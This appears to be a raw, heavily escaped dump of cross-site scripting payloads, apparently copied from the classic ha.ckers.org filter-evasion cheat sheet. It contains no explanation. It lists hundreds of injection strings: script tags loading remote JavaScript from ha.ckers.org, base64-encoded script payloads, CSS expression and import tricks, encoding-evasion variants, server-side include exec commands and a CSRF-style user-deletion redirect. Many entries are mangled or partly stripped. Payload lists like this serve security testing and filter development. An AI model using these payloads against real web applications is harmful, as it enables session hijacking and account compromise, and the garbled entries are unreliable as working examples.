src=\\\PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\"&gt;\\r\\n&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;EMBED SRC=\\\PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"&gt;&lt;/EMBED&gt;\\r\\n\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n\\\" \\\'\\\' SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n\\\'\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n\\\'&gt;\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\nPT SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;\\r\\n&lt;\\\"\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\"&gt;\\\'&gt;\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\"&gt;\\\'&gt;&submit.x=27&submit.y=9&cmd=search\\r\\n&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510\\r\\n&search=1\\r\\n0&q=\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert%2?8String.fromCharCode(88,83,83))//\\\";alert&#40;String.fromCharCode?(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;%?29//--&gt;\\\"&gt;\\\'&gt;&submit-frmGoogleWeb=Web+Search\\r\\n&lt;h1&gt;&lt;font color=blue&gt;hellox worldss&lt;/h1&gt;\\r\\n&lt;BODY worldss\\\')&gt;\\r\\n&lt;input autofocus&gt;\\r\\n&lt;input autofocus&gt;&lt;input autofocus&gt;\\r\\n&lt;body &gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;\\r\\n&lt;form&gt;&lt;button &gt;lol\\r\\n&lt;!--&lt;img &gt;&lt;img &gt;\\r\\n&lt;![&gt;&lt;img &gt;&lt;img &gt;\\r\\n&lt;style&gt;&lt;img &gt;&lt;img &gt;\\r\\n&lt;? foo=\\\"&gt;\\\"&gt;\\r\\n&lt;! foo=\\\"&gt;\\\"&gt;\\r\\n&lt;/ foo=\\\"&gt;\\\"&gt;\\r\\n&lt;? foo=\\\"&gt;&lt;x foo=\\\'?&gt;\\\'&gt;\\\"&gt;\\r\\n&lt;! foo=\\\"[[[Inception]]\\\"&gt;&lt;x foo=\\\"]foo&gt;\\\"&gt;\\r\\n&lt;% foo&gt;&lt;x foo=\\\"%&gt;\\\"&gt;\\r\\n&lt;div ;color:red;\\\';\\\"&gt;LOL\\r\\nLOL&lt;style&gt;*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}&lt;/style&gt;\\r\\n\\r\\n&lt;svg xmlns=\\\"http://www.w3.org/2000/svg\\\"&gt;LOL&lt;/svg&gt;\\r\\nalert&#40;/XSS/.source&#41;\\r\\n\\\\\\\\\\\";alert&#40;\\\'XSS\\\'&#41;;//\\r\\n&lt;/TITLE&gt;alert&#40;\\\\\\\"XSS\\\\\\\"&#41;;\\r\\n&lt;INPUT TYPE=\\\\\\\"IMAGE\\\\\\\" SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;BODY BACKGROUND=\\\\\\\"(\\\'XSS\\\')\\\\\\\"&gt;\\r\\n&lt;BODY =alert&#40;\\\'XSS\\\'&#41;&gt;\\r\\n&lt;IMG DYNSRC=\\\\\\\"(\\\'XSS\\\')\\\\\\\"&gt;\\r\\n&lt;IMG LOWSRC=\\\\\\\"(\\\'XSS\\\')\\\\\\\"&gt;\\r\\n&lt;BGSOUND SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;BR SIZE=\\\\\\\"&{alert&#40;\\\'XSS\\\'&#41;}\\\\\\\"&gt;\\r\\n&lt;LAYER SRC=\\\\\\\"http://ha.ckers.org/scriptlet.html\\\\\\\"&gt;&lt;/LAYER&gt;\\r\\n&lt;LINK REL=\\\\\\\"stylesheet\\\\\\\" HREF=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;LINK REL=\\\\\\\"stylesheet\\\\\\\" HREF=\\\\\\\"http://ha.ckers.org/xss.css\\\\\\\"&gt;\\r\\n&lt;STYLE&gt;@import\\\'http://ha.ckers.org/xss.css\\\';&lt;/STYLE&gt;\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"Link\\\\\\\" Content=\\\\\\\"&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet\\\\\\\"&gt;\\r\\n&lt;STYLE&gt;BODY{:url(\\\\\\\"http://ha.ckers.org/xssmoz.xml#xss\\\\\\\")}&lt;/STYLE&gt;\\r\\n&lt;XSS STYLE=\\\\\\\"(xss.htc);\\\\\\\"&gt;\\r\\n&lt;STYLE&gt;li {list-style-image: url(\\\\\\\"(\\\'XSS\\\')\\\\\\\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\n&lt;IMG SRC=\\\'(\\\\\\\"XSS\\\\\\\")\\\'&gt;\\r\\n&lt;IMG SRC=\\\\\\\"\\\\\\\"&gt;\\r\\n&lt;IMG SRC=\\\\\\\"\\\\\\\"&gt;\\r\\nžscriptualert&#40;EXSSE&#41;ž/scriptu\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0;url=(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\\\\\"&gt;\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0; URL=http://;URL=(\\\'XSS\\\');\\\\\\\"\\r\\n&lt;IFRAME SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;&lt;/FRAMESET&gt;\\r\\n&lt;TABLE BACKGROUND=\\\\\\\"(\\\'XSS\\\')\\\\\\\"&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\\\\\"(\\\'XSS\\\')\\\\\\\"&gt;\\r\\n&lt;DIV STYLE=\\\\\\\"background-image: url((\\\'XSS\\\'))\\\\\\\"&gt;\\r\\n&lt;DIV STYLE=\\\\\\\"background-image:\\\\0075\\\\0072\\\\006C\\\\0028\\\'\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029\\\'\\\\0029\\\\\\\"&gt;\\r\\n&lt;DIV STYLE=\\\\\\\"background-image: url((\\\'XSS\\\'))\\\\\\\"&gt;\\r\\n&lt;DIV STYLE=\\\\\\\"width: alert&#40;\\\'XSS\\\'&#41;);\\\\\\\"&gt;\\r\\n&lt;STYLE&gt;@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert&#40;\\\\\\\"XSS\\\\\\\"&#41;\\\';&lt;/STYLE&gt;\\r\\n&lt;IMG STYLE=\\\\\\\"xss:expr/*XSS*/ession(alert&#40;\\\'XSS\\\'&#41;)\\\\\\\"&gt;\\r\\n&lt;XSS STYLE=\\\\\\\"xss:alert&#40;\\\'XSS\\\'&#41;)\\\\\\\"&gt;\\r\\nexp/*&lt;A STYLE=\\\'no\\\\xss:noxss(\\\\\\\"*//*\\\\\\\");\\r\\nxss:ex/*XSS*//*/*/pression(alert&#40;\\\\\\\"XSS\\\\\\\"&#41;)\\\'&gt;\\r\\n&lt;STYLE TYPE=\\\\\\\"text/javascript\\\\\\\"&gt;alert&#40;\\\'XSS\\\'&#41;;&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;.XSS{background-image:url(\\\\\\\"(\\\'XSS\\\')\\\\\\\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;\\r\\n&lt;STYLE type=\\\\\\\"text/css\\\\\\\"&gt;BODY{background:url(\\\\\\\"(\\\'XSS\\\')\\\\\\\")}&lt;/STYLE&gt;\\r\\n&lt;!--[if gte IE 4]&gt;\\r\\nalert&#40;\\\'XSS\\\'&#41;;\\r\\n&lt;![endif]--&gt;\\r\\n&lt;BASE HREF=\\\\\\\"(\\\'XSS\\\');//\\\\\\\"&gt;\\r\\n&lt;OBJECT TYPE=\\\\\\\"text/x-scriptlet\\\\\\\" DATA=\\\\\\\"http://ha.ckers.org/scriptlet.html\\\\\\\"&gt;&lt;/OBJECT&gt;\\r\\n&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=(\\\'XSS\\\')&gt;&lt;/OBJECT&gt;\\r\\n&lt;EMBED SRC=\\\\\\\"http://ha.ckers.org/xss.swf\\\\\\\" AllowScriptAccess=\\\\\\\"always\\\\\\\"&gt;&lt;/EMBED&gt;\\r\\n&lt;EMBED SRC=\\\\\\\PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\\\\\" type=\\\\\\\"image/svg+xml\\\\\\\" AllowScriptAccess=\\\\\\\"always\\\\\\\"&gt;&lt;/EMBED&gt;\\r\\na=\\\\\\\"get\\\\\\\";\\r\\nb=\\\\\\\"URL(\\\\\\\\\\\"\\\\\\\";\\r\\nc=\\\\\\\"\\\\\\\";\\r\\nd=\\\\\\\"alert&#40;\\\'XSS\\\'&#41;;\\\\\\\\\\\")\\\\\\\";\\r\\neval&#40;a+b+c+d&#41;;\\r\\n&lt;HTML xmlns:xss&gt;&lt;?import namespace=\\\\\\\"xss\\\\\\\" implementation=\\\\\\\"http://ha.ckers.org/xss.htc\\\\\\\"&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;\\r\\n&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=\\\\\\\"javas]]&gt;&lt;![CDATA[cript:alert&#40;\\\'XSS\\\'&#41;;\\\\\\\"&gt;]]&gt;\\r\\n&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;\\r\\n&lt;XML ID=\\\\\\\"xss\\\\\\\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\\\\\\\"javas&lt;!-- --&gt;cript:alert&#40;\\\'XSS\\\'&#41;\\\\\\\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;\\r\\n&lt;SPAN DATASRC=\\\\\\\"#xss\\\\\\\" DATAFLD=\\\\\\\"B\\\\\\\" DATAFORMATAS=\\\\\\\"HTML\\\\\\\"&gt;&lt;/SPAN&gt;\\r\\n&lt;XML SRC=\\\\\\\"xsstest.xml\\\\\\\" ID=I&gt;&lt;/XML&gt;\\r\\n&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;\\r\\n&lt;HTML&gt;&lt;BODY&gt;\\r\\n&lt;?xml:namespace prefix=\\\\\\\"t\\\\\\\" ns=\\\\\\\"urn:schemas-microsoft-com:time\\\\\\\"&gt;\\r\\n&lt;?import namespace=\\\\\\\"t\\\\\\\" implementation=\\\\\\\"#default#time2\\\\\\\"&gt;\\r\\n&lt;t:set attributeName=\\\\\\\"innerHTML\\\\\\\" to=\\\\\\\"XSS&lt;SCRIPT DEFER&gt;alert&#40;"XSS"&#41;\\\\\\\"&gt;\\r\\n&lt;/BODY&gt;&lt;/HTML&gt;\\r\\n&lt;SCRIPT SRC=\\\\\\\"http://ha.ckers.org/xss.jpg\\\\\\\"&gt;\\r\\n&lt;!--#exec cmd=\\\\\\\"/bin/echo \\\'&lt;SCR\\\'\\\\\\\"--&gt;&lt;!--#exec cmd=\\\\\\\"/bin/echo \\\'IPT SRC=http://ha.ckers.org/xss.js&gt;\\\'\\\\\\\"--&gt;\\r\\n&lt;? echo(\\\'&lt;SCR)\\\';\\r\\necho(\\\'IPT&gt;alert&#40;\\\\\\\"XSS\\\\\\\"&#41;\\\'); ?&gt;\\r\\n&lt;IMG SRC=\\\\\\\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\\\\\\\"&gt;\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"Set-Cookie\\\\\\\" Content=\\\\\\\"USERID=alert&#40;\\\'XSS\\\'&#41;\\\\\\\"&gt;\\r\\n&lt;HEAD&gt;&lt;META HTTP-EQUIV=\\\\\\\"CONTENT-TYPE\\\\\\\" CONTENT=\\\\\\\"text/html; charset=UTF-7\\\\\\\"&gt; &lt;/HEAD&gt;\\r\\n&lt;SCRIPT a=\\\\\\\"&gt;\\\\\\\" SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n&lt;SCRIPT =\\\\\\\"&gt;\\\\\\\" SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n&lt;SCRIPT a=\\\\\\\"&gt;\\\\\\\" \\\'\\\' SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n&lt;SCRIPT \\\\\\\"a=\\\'&gt;\\\'\\\\\\\" SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n&lt;SCRIPT a=`&gt;` SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n&lt;SCRIPT a=\\\\\\\"&gt;\\\'&gt;\\\\\\\" SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n(\\\\\\\"&lt;SCRI\\\\\\\");PT SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n&lt;A HREF=\\\\\\\"http://66.102.7.147/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://www.google.com\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://1113982867/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://0x42.0x0000066.0x7.0x93/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://0102.0146.0007.00000223/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"htt p://6 6.000146.0x7.147/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"//www.google.com/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"//google\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://ha.ckers.org@google\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://google:ha.ckers.org\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://google.com/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://www.google.com./\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"\\\'http://www.google.com/\\\'\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://www.gohttp://www.google.com/ogle.com/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt\\r\\n&lt;\\r\\n&LT\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&#X3c\\r\\n&#X03c\\r\\n&#X003c\\r\\n&#X0003c\\r\\n&#X00003c\\r\\n&#X000003c\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&#X3C\\r\\n&#X03C\\r\\n&#X003C\\r\\n&#X0003C\\r\\n&#X00003C\\r\\n&#X000003C\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n\\\\x3c\\r\\n\\\\x3C\\r\\n\\\&lt;\\r\\n\\\&lt;\\r\\n&lt;iframe src=http://ha.ckers.org/scriptlet.html&gt;\\r\\n&lt;IMG SRC=\\\\\\\"(\\\'XSS\\\')\\\\\\\"\\r\\n&lt;SCRIPT SRC=//ha.ckers.org/.js&gt;\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;\\r\\n&lt;alert&#40;\\\\\\\"XSS\\\\\\\"&#41;;//&lt;\\r\\n&lt;SCRIPT/SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n&lt;BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert&#40;\\\\\\\"XSS\\\\\\\"&#41;&gt;\\r\\n&lt;SCRIPT/XSS SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n&lt;IMG SRC=\\\\\\\" (\\\'XSS\\\');\\\\\\\"&gt;\\r\\nperl -e \\\'print \\\\\\\"&lt;SCR\\\\0IPT&gt;alert&#40;\\\\\\\\\\\"XSS\\\\\\\\\\\"&#41;&lt;/SCR\\\\0IPT&gt;\\\\\\\";\\\' &gt; out\\r\\nperl -e \\\'print \\\\\\\"&lt;IMG SRC=java\\\\0script:alert&#40;\\\\\\\\\\\"XSS\\\\\\\\\\\"&#41;&gt;\\\\\\\";\\\' &gt; out\\r\\n&lt;IMG SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;IMG SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;IMG SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;IMG SRC=('XSS')&gt;\\r\\n&lt;IMG SRC=('XSS')&gt;\\r\\n&lt;IMG SRC=(\\\'XSS\\\')&gt;\\r\\n&lt;IMG SRC=(String.fromCharCode(88,83,83))&gt;\\r\\n&lt;IMG \\\\\\\"\\\\\\\"\\\\\\\"&gt;alert&#40;\\\\\\\"XSS\\\\\\\"&#41;\\\\\\\"&gt;\\r\\n&lt;IMG SRC=`(\\\\\\\"RSnake says, \\\'XSS\\\'\\\\\\\")`&gt;\\r\\n&lt;IMG SRC=("XSS")&gt;\\r\\n&lt;IMG SRC=(\\\'XSS\\\')&gt;\\r\\n&lt;IMG SRC=(\\\'XSS\\\')&gt;\\r\\n&lt;IMG SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;\\r\\n\\\'\\\';!--\\\\\\\"&lt;XSS&gt;=&{()}\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\\\\\"&gt;\\\'&gt;alert&#40;String.fromCharCode(88,83,83&#41;)\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\"&gt;\\\'&gt;\\r\\n\\\'\\\';!--\\\"&lt;XSS&gt;=&{()}\\r\\n\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG \\\"\\\"\\\"&gt;\\\"&gt;\\r\\n&lt;IMG &gt;\\r\\n\\r\\n\\r\\n&lt;\\r\\n\\r\\n\\\\\\\";alert&#40;\\\'XSS\\\'&#41;;//\\r\\n&lt;/TITLE&gt;\\r\\n\\r\\n&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/FRAMESET&gt;\\r\\n&lt;TABLE BACKGROUND=\\\"(\\\'XSS\\\')\\\"&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\"(\\\'XSS\\\')\\\"&gt;\\r\\n&lt;DIV url((\\\'XSS\\\'))\\\"&gt;\\r\\n&lt;DIV &gt;\\r\\n&lt;DIV alert&#40;\\\'XSS\\\'&#41;);\\\"&gt;\\r\\n&lt;STYLE&gt;@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert&#40;\\\"XSS\\\"&#41;\\\';&lt;/STYLE&gt;\\r\\n&lt;IMG &gt;\\&gt;\\r\\nexp/*&lt;A &gt;\\r\\n&lt;EMBED SRC=\\\"http://ha.ckers.org/xss.swf\\\" AllowScriptAccess=\\\"always\\\"&gt;&lt;/EMBED&gt;\\r\\na=\\\"get\\\";b=\\\"URL(ja\\\\\\\"\\\";c=\\\"vascr\\\";d=\\\"ipt:ale\\\";e=\\\"rt(\\\'XSS\\\');\\\\\\\")\\\";eval&#40;a+b+c+d+e&#41;;\\r\\n\\r\\n&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"&gt;&lt;?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"&gt;&lt;t:set attributeName=\\\"innerHTML\\\" to=\\\"XSS&lt;SCRIPT DEFER&gt;alert&#40;"XSS"&#41;\\\"&gt;&lt;/BODY&gt;&lt;/HTML&gt;\\r\\nPT SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;form id=\\\"test\\\" /&gt;&lt;button &gt;TESTHTML5FORMACTION\\r\\n&lt;form&gt;&lt;button &gt;crosssitespt\\r\\n&lt;frameset &gt;\\r\\n&lt;!--&lt;img &gt;&lt;img &gt;\\r\\n&lt;style&gt;&lt;img &gt;&lt;img &gt;\\r\\n&lt;object data=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\"&gt;\\r\\n&lt;embed src=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\"&gt;\\r\\n&lt;embed src=\\\"(1)\\\"&gt;\\r\\n&lt;? foo=\\\"&gt;\\\"&gt;\\r\\n&lt;! foo=\\\"&gt;\\\"&gt;\\r\\n&lt;/ foo=\\\"&gt;\\\"&gt;\\r\\n\\r\\n\\r\\n\\r\\n{alert&#40;1&#41;};1\\r\\n\\r\\n&lt;svg xmlns=\\\"#\\\"&gt;&lt;/svg&gt;\\r\\n&lt;svg xmlns=\\\"#\\\"&gt;&lt;/svg&gt;\\r\\n&lt;iframe xmlns=\\\"#\\\" src=\\\"(1)\\\"&gt;&lt;/iframe&gt;\\r\\n\\r\\n\\r\\n"&gt;&lt;"\\r\\n">&lt;"\\r\\n\\r\\n“&gt;&lt;s”+”cript&gt;alert&#40;&#41;\\r\\n“&gt;\\r\\n“&gt;&lt;\\r\\nfoo\\r\\n&lt;scralert&#40;&#41;\\r\\n"/&gt;&lt;BODY src=http://my.box.com/xss.js&gt;")’&gt;\\r\\n‘; alert&#40;&#41;; var foo=’\\r\\nfoo\\\\’; alert&#40;&#41;;//’;\\r\\n\\r\\n&lt;img &gt;\\&gt;\\r\\n\\r\\n\\\"&gt;\\r\\n&lt;video &gt;\\r\\n&lt;audio &gt;\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\"&gt;\\\'&gt;\\r\\n\\\'\\\';!--\\\"&lt;XSS&gt;=&{()}\\r\\n0\\\\\\\"autofocus/=alert&#40;1&#41;--&gt;&lt;video/&gt;\\\"-&gt;\\r\\n&lt;video/&gt;\\&gt;\\r\\n\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;a &gt;xxs link&lt;/a&gt;\\r\\n&lt;a &gt;xxs link&lt;/a&gt;\\r\\n&lt;IMG \\\"\\\"\\\"&gt;\\\"&gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;&lt;/img&gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n\\r\\n&lt;BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert&#40;\\\"XSS\\\"&#41;&gt;\\r\\n\\r\\n&lt;\\r\\n\\r\\n\\r\\n&lt;IMG &gt;\\r\\n&lt;/TITLE&gt;\\r\\n&lt;INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;BODY BACKGROUND=\\\"(\\\'XSS\\\')\\\"&gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;STYLE&gt;li {list-style-image: url(\\\"(\\\'XSS\\\')\\\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;BODY &gt;\\r\\n&lt;BGSOUND SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;BR SIZE=\\\"&{alert&#40;\\\'XSS\\\'&#41;}\\\"&gt;\\r\\n&lt;LINK REL=\\\"stylesheet\\\" HREF=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;LINK REL=\\\"stylesheet\\\" HREF=\\\"http://ha.ckers.org/xss.css\\\"&gt;\\r\\n&lt;STYLE&gt;@import\\\'http://ha.ckers.org/xss.css\\\';&lt;/STYLE&gt;\\r\\n&lt;META HTTP-EQUIV=\\\"Link\\\" Content=\\\"&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet\\\"&gt;\\r\\n&lt;STYLE&gt;BODY{:url(\\\"http://ha.ckers.org/xssmoz.xml#xss\\\")}&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert&#40;\\\"XSS\\\"&#41;\\\';&lt;/STYLE&gt;\\r\\n&lt;IMG &gt;\\r\\nexp/*&lt;A &gt;\\r\\n&lt;STYLE 